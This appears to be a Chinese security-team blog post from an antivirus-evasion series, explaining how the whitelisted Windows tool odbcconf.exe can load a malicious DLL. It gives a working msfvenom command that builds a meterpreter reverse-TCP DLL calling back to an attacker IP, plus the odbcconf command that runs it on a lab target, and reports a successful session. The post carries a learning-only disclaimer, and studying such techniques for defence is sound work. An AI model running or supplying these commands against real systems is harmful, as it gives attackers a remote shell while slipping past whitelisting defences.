远控免杀专题(59)-白名单Odbcconf.exe执行payload
2022-7-29 00:1:38 Author: 白帽子(查看原文) 阅读量:16 收藏

声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus


Odbcconf.exe是一个命令行工具,可让您配置ODBC驱动程序和数据源名称(微软官方文档https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver15)。

Odbcconf.exe在windows中的的一般路径为C:\Windows\System32\odbcconf.exe  C:\Windows\SysWOW64\odbcconf.exe

通过文档可发现有两种方式来加载dll,/A和/F

攻击机:kali    ip地址:192.168.10.130

靶机:win7     ip地址:192.168.10.135

使用msfvenom生成shellcode,注意生成的是dll格式

msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=4444 -f dll > hacker.dll

设置监听:

靶机运行payload:

odbcconf.exe /a {regsvr C:\Users\Administrator\Desktop\hacker.dll}

成功上线:

这个也被杀软盯上了,行为检测预警。

基于白名单Odbcconf执行payload:https://micro8.github.io/Micro8-HTML/Chapter1/81-90/82_%E5%9F%BA%E4%BA%8E%E7%99%BD%E5%90%8D%E5%8D%95Odbcconf%E6%89%A7%E8%A1%8Cpayload%E7%AC%AC%E5%8D%81%E4%BA%8C%E5%AD%A3.html

E

N

D

guān

zhù

men

Tide安全团队正式成立于2019年1月是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

对安全感兴趣的小伙伴可以关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246205&idx=2&sn=58af403b3f35b4ed4f737768e12b145f&chksm=82ea5794b59dde8208c039a94f0da8cd2e06252450833c4834123a5ba051b505fdfdcc6a36fc#rd
如有侵权请联系:admin#unsafe.sh